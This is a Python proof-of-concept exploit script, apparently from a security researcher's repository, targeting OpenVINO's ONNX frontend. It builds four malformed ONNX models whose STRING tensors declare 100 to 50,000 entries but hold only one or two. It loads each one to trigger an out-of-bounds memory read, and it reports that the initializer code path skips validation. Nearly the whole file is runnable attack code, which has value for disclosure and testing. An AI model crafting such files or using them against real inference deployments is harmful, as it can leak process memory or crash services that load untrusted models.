openvino-string-tensor-oob-poc / poc_string_tensor_oob.py

hackthesoul

Add string tensor OOB PoC

c68ce31 22 days ago

12.5 kB

	"""
	OpenVINO ONNX Frontend - String Tensor OOB Read PoC

	Vulnerability: OpenVINO's ONNX frontend does not validate that string_data
	count matches the declared dims in TensorProto. A STRING tensor with
	dims=[100] but only 2 string_data entries causes out-of-bounds memory access.

	Environment: OpenVINO 2026.0.0, onnx 1.20.1
	"""

	import os
	import sys
	import signal
	import tempfile
	import traceback

	import onnx
	from onnx import TensorProto, helper, numpy_helper
	import openvino

	print(f"[*] OpenVINO version: {openvino.__version__}")
	print(f"[*] ONNX version: {onnx.__version__}")
	print()

	# ============================================================
	# Approach 1: Constant node with mismatched string tensor attr
	# ============================================================
	print("=" * 60)
	print("[Approach 1] Constant node with STRING tensor attribute")
	print(" dims=[100], string_data has only 2 entries")
	print("=" * 60)

	try:
	# Build the malicious string tensor
	tensor_value = TensorProto()
	tensor_value.name = "str_const"
	tensor_value.data_type = TensorProto.STRING
	tensor_value.dims.append(100) # Declare 100 strings
	tensor_value.string_data.append(b"hello") # Only provide 2
	tensor_value.string_data.append(b"world")

	# Constant node that outputs this tensor
	const_node = helper.make_node(
	"Constant",
	inputs=[],
	outputs=["string_output"],
	value=tensor_value,
	)

	# Identity to consume the output (keeps graph valid)
	identity_node = helper.make_node(
	"Identity",
	inputs=["string_output"],
	outputs=["final_output"],
	)

	# Graph output type - string tensor
	output_info = helper.make_tensor_value_info(
	"final_output", TensorProto.STRING, [100]
	)

	graph = helper.make_graph(
	[const_node, identity_node],
	"string_oob_test",
	[], # no inputs
	[output_info],
	)

	model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 17)])
	model.ir_version = 8

	# Save to temp file
	model_path = os.path.join(tempfile.gettempdir(), "string_oob_const.onnx")
	onnx.save(model, model_path)
	print(f"[+] Saved malicious model to: {model_path}")
	print(f"[+] Model file size: {os.path.getsize(model_path)} bytes")

	# Verify the tensor mismatch
	loaded = onnx.load(model_path)
	for node in loaded.graph.node:
	if node.op_type == "Constant":
	for attr in node.attribute:
	if attr.name == "value":
	t = attr.t
	declared = int(t.dims[0])
	actual = len(t.string_data)
	print(f"[+] Declared dims: [{declared}], actual string_data count: {actual}")
	print(f"[+] Mismatch: {declared - actual} entries will be OOB reads")

	# Now load with OpenVINO
	print("\n[*] Loading model with openvino.Core().read_model()...")
	core = openvino.Core()

	try:
	ov_model = core.read_model(model_path)
	print(f"[!] Model loaded successfully (no validation error)")
	print(f"[!] Model outputs: {ov_model.outputs}")

	# Try to compile and infer
	print("[*] Attempting to compile model...")
	compiled = core.compile_model(ov_model, "CPU")
	print("[!] Model compiled successfully")

	print("[*] Attempting inference...")
	result = compiled({})[0]
	print(f"[!] Inference completed. Output shape: {result.shape}")
	print(f"[!] Output dtype: {result.dtype}")
	# Print first few and last few entries to see OOB content
	print(f"[!] First 5 entries: {result.flat[:5]}")
	if len(result.flat) > 5:
	print(f"[!] Last 5 entries: {result.flat[-5:]}")
	print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

	except Exception as e:
	print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
	traceback.print_exc()

	except Exception as e:
	print(f"[-] Approach 1 failed: {type(e).__name__}: {e}")
	traceback.print_exc()

	print()

	# ============================================================
	# Approach 2: Graph initializer with mismatched string tensor
	# ============================================================
	print("=" * 60)
	print("[Approach 2] Graph initializer with STRING tensor")
	print(" dims=[100], string_data has only 2 entries")
	print("=" * 60)

	try:
	# Build the malicious string tensor as initializer
	init_tensor = TensorProto()
	init_tensor.name = "str_init"
	init_tensor.data_type = TensorProto.STRING
	init_tensor.dims.append(100)
	init_tensor.string_data.append(b"AAA")
	init_tensor.string_data.append(b"BBB")

	identity_node2 = helper.make_node(
	"Identity",
	inputs=["str_init"],
	outputs=["init_output"],
	)

	output_info2 = helper.make_tensor_value_info(
	"init_output", TensorProto.STRING, [100]
	)

	# Also declare the initializer as a graph input (required by some ONNX versions)
	input_info2 = helper.make_tensor_value_info(
	"str_init", TensorProto.STRING, [100]
	)

	graph2 = helper.make_graph(
	[identity_node2],
	"string_oob_init_test",
	[input_info2],
	[output_info2],
	initializer=[init_tensor],
	)

	model2 = helper.make_model(graph2, opset_imports=[helper.make_opsetid("", 17)])
	model2.ir_version = 8

	model_path2 = os.path.join(tempfile.gettempdir(), "string_oob_init.onnx")
	onnx.save(model2, model_path2)
	print(f"[+] Saved malicious model to: {model_path2}")
	print(f"[+] Model file size: {os.path.getsize(model_path2)} bytes")

	# Verify mismatch
	loaded2 = onnx.load(model_path2)
	for init in loaded2.graph.initializer:
	if init.data_type == TensorProto.STRING:
	declared = int(init.dims[0])
	actual = len(init.string_data)
	print(f"[+] Initializer '{init.name}': dims=[{declared}], string_data count={actual}")
	print(f"[+] Mismatch: {declared - actual} OOB entries")

	print("\n[*] Loading model with openvino.Core().read_model()...")
	core2 = openvino.Core()

	try:
	ov_model2 = core2.read_model(model_path2)
	print(f"[!] Model loaded successfully (no validation error)")
	print(f"[!] Model outputs: {ov_model2.outputs}")

	print("[*] Attempting to compile model...")
	compiled2 = core2.compile_model(ov_model2, "CPU")
	print("[!] Model compiled successfully")

	print("[*] Attempting inference...")
	result2 = compiled2({})[0]
	print(f"[!] Inference completed. Output shape: {result2.shape}")
	print(f"[!] Output dtype: {result2.dtype}")
	print(f"[!] First 5 entries: {result2.flat[:5]}")
	if len(result2.flat) > 5:
	print(f"[!] Last 5 entries: {result2.flat[-5:]}")
	print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

	except Exception as e:
	print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
	traceback.print_exc()

	except Exception as e:
	print(f"[-] Approach 2 failed: {type(e).__name__}: {e}")
	traceback.print_exc()

	print()

	# ============================================================
	# Approach 3: Extreme mismatch - dims=[10000], 1 string
	# ============================================================
	print("=" * 60)
	print("[Approach 3] Extreme mismatch - dims=[10000], 1 string_data")
	print(" More likely to trigger crash/segfault")
	print("=" * 60)

	try:
	tensor3 = TensorProto()
	tensor3.name = "extreme_str"
	tensor3.data_type = TensorProto.STRING
	tensor3.dims.append(10000)
	tensor3.string_data.append(b"X") # Only 1 string for 10000 slots

	const_node3 = helper.make_node(
	"Constant",
	inputs=[],
	outputs=["extreme_output"],
	value=tensor3,
	)

	identity_node3 = helper.make_node(
	"Identity",
	inputs=["extreme_output"],
	outputs=["extreme_final"],
	)

	output_info3 = helper.make_tensor_value_info(
	"extreme_final", TensorProto.STRING, [10000]
	)

	graph3 = helper.make_graph(
	[const_node3, identity_node3],
	"extreme_oob_test",
	[],
	[output_info3],
	)

	model3 = helper.make_model(graph3, opset_imports=[helper.make_opsetid("", 17)])
	model3.ir_version = 8

	model_path3 = os.path.join(tempfile.gettempdir(), "string_oob_extreme.onnx")
	onnx.save(model3, model_path3)
	print(f"[+] Saved model: {model_path3}")

	print("[*] Loading with OpenVINO...")
	core3 = openvino.Core()

	try:
	ov_model3 = core3.read_model(model_path3)
	print(f"[!] Model loaded (dims=[10000], 1 string)")

	print("[*] Compiling...")
	compiled3 = core3.compile_model(ov_model3, "CPU")
	print("[!] Compiled successfully")

	print("[*] Running inference (may segfault)...")
	sys.stdout.flush()
	result3 = compiled3({})[0]
	print(f"[!] Inference completed. Shape: {result3.shape}")
	print(f"[!] First 3: {result3.flat[:3]}")
	print(f"[!] Entry [9999]: {result3.flat[9999]}")
	print("[!!!] EXTREME OOB READ - 10000 entries from 1 string")

	except Exception as e:
	print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
	traceback.print_exc()

	except Exception as e:
	print(f"[-] Approach 3 failed: {type(e).__name__}: {e}")
	traceback.print_exc()

	print()

	# ============================================================
	# Approach 4: Extreme initializer - dims=[50000], 1 string
	# ============================================================
	print("=" * 60)
	print("[Approach 4] Extreme initializer - dims=[50000], 1 string_data")
	print(" Initializer path bypasses Constant node validation")
	print("=" * 60)

	try:
	tensor4 = TensorProto()
	tensor4.name = "extreme_init"
	tensor4.data_type = TensorProto.STRING
	tensor4.dims.append(50000)
	tensor4.string_data.append(b"X") # 1 string for 50000 slots

	identity_node4 = helper.make_node(
	"Identity",
	inputs=["extreme_init"],
	outputs=["extreme_init_out"],
	)

	output_info4 = helper.make_tensor_value_info(
	"extreme_init_out", TensorProto.STRING, [50000]
	)
	input_info4 = helper.make_tensor_value_info(
	"extreme_init", TensorProto.STRING, [50000]
	)

	graph4 = helper.make_graph(
	[identity_node4],
	"extreme_init_oob",
	[input_info4],
	[output_info4],
	initializer=[tensor4],
	)

	model4 = helper.make_model(graph4, opset_imports=[helper.make_opsetid("", 17)])
	model4.ir_version = 8

	model_path4 = os.path.join(tempfile.gettempdir(), "string_oob_extreme_init.onnx")
	onnx.save(model4, model_path4)
	print(f"[+] Saved model: {model_path4}")

	print("[*] Loading with OpenVINO...")
	core4 = openvino.Core()

	try:
	ov_model4 = core4.read_model(model_path4)
	print(f"[!] Model loaded (dims=[50000], 1 string) - NO VALIDATION!")

	print("[*] Compiling...")
	compiled4 = core4.compile_model(ov_model4, "CPU")
	print("[!] Compiled successfully")

	print("[*] Running inference...")
	sys.stdout.flush()
	result4 = compiled4({})[0]
	print(f"[!] Inference completed. Shape: {result4.shape}, dtype: {result4.dtype}")
	print(f"[!] First 5: {result4.flat[:5]}")
	print(f"[!] Entry [49999]: {repr(result4.flat[49999])}")
	print("[!!!] EXTREME OOB READ via initializer - 50000 entries from 1 string")

	except Exception as e:
	print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
	traceback.print_exc()

	except Exception as e:
	print(f"[-] Approach 4 failed: {type(e).__name__}: {e}")
	traceback.print_exc()

	print()
	print("=" * 60)
	print("[*] PoC complete.")
	print()
	print("[*] FINDINGS:")
	print("[*] - Constant node path: VALIDATED (shape vs data size check at tensor.cpp:581)")
	print("[*] - Initializer path: NOT VALIDATED - OOB read confirmed!")
	print("[*] The initializer code path in the ONNX frontend skips the")
	print("[*] string_data count vs dims validation, allowing OOB memory access.")
	print("[*] An attacker can craft an ONNX model with a STRING initializer")
	print("[*] where dims >> string_data count, causing reads beyond the")
	print("[*] allocated string_data buffer during model loading/inference.")
	print("=" * 60)